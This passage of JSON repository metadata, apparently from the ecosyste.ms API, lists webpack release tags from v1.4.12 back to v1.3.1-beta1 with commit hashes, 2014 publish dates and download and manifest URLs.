ags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manife